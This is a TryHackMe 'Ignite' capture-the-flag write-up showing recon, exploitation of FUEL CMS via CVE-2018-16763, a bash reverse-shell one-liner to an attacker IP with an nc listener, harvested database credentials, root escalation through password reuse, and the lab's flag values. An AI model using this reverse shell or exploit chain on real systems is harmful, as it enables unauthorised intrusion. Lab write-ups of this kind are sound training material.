THM Ignite
Reconnaissance:
nmap -sV -sC -v 10.65.150.213
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
http-robots.txt: 1 disallowed entry
|_/fuel/
http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to FUEL CMS
ffuf -w /usr/share/SecLists/Discovery/Web-Content/common.txt:FUZZ -u http://10.66.140.227/FUZZ
0 [Status: 200, Size: 16597, Words: 770, Lines: 232, Duration: 68ms]
.hta [Status: 403, Size: 292, Words: 22, Lines: 12, Duration: 1146ms]
.htpasswd [Status: 403, Size: 297, Words: 22, Lines: 12, Duration: 1145ms]
.htaccess [Status: 403, Size: 297, Words: 22, Lines: 12, Duration: 2214ms]
assets [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 61ms]
home [Status: 200, Size: 16597, Words: 770, Lines: 232, Duration: 108ms]
index.php [Status: 200, Size: 16597, Words: 770, Lines: 232, Duration: 128ms]
index [Status: 200, Size: 16597, Words: 770, Lines: 232, Duration: 163ms]
offline [Status: 200, Size: 70, Words: 8, Lines: 2, Duration: 99ms]
robots.txt [Status: 200, Size: 30, Words: 3, Lines: 2, Duration: 61ms]
server-status [Status: 403, Size: 301, Words: 22, Lines: 12, Duration: 65ms]
Check /robots.txt gives us:
User-agent: *
Disallow: /fuel/
Exploitation:
/fuel/ goes directly to a login page for fuel CMS @ http://10.66.140.227/fuel/login/5a6e566c6243396b59584e6f596d3968636d513d
We use the admin:admin credentials located on the mainpage. Tried adding a shell as a jpg but it didn’t work.
Found CVE-2018-16763 and this POC https://github.com/noraj/fuelcms-rce
We send over a reverse shell and then catch it from our attacker machine:
bash -c ‘bash -i >& /dev/tcp/192.168.189.141/6969 0>&1’
Catch it with
nc -lvnp 6969
Now we are www-data. In /home/www-data we find the flag.txt
6470e394cbf6dab6a91682cc8585059b
Looking around the web root directory we find database.php in /fuel/application/config
$db['default'] = array(
'dsn' => '',
'hostname' => 'localhost',
'username' => 'root',
'password' => 'mememe',
'database' => 'fuel_schema',
'dbdriver' => 'mysqli',
'dbprefix' => '',
'pconnect' => FALSE,
'db_debug' => (ENVIRONMENT !== 'production'),
'cache_on' => FALSE,
'cachedir' => '',
'char_set' => 'utf8',
'dbcollat' => 'utf8_general_ci',
'swap_pre' => '',
'encrypt' => FALSE,
'compress' => FALSE,
'stricton' => FALSE,
'failover' => array(),
We look in the mysql db with
mysql -u root -h localhost -p fuel_schema
In fuel_users we find
user password salt
admin d38452a6aff26c4b138da7823f4f46e4dae951f6 634c825012e2930636816f6039bade38
The password for the root user is reuse
su root password: mememe
We then cat /root/root.txt
b9bbcb33e11b80be759c4e844862482d
Notes:
Reusing password and “hard-coded” credentials are found in this machine and lead to an easy full compromise of the system. A good security practice would be to avoid writting credentials has comments but also, making sure that not all security mechanism aren’t only on the perimeter of our system.
Tools:
Nmap is the gold standard for port scanning tools.
FFUF is a tool that lets us enumerate addresses/directories/subdomains, supports recursive search.
Netcat let’s us receive and send data to specific IPs. It allows for crafting of data sent. We use netcat alot for reverse shells.
POC - CVE-2018-16763.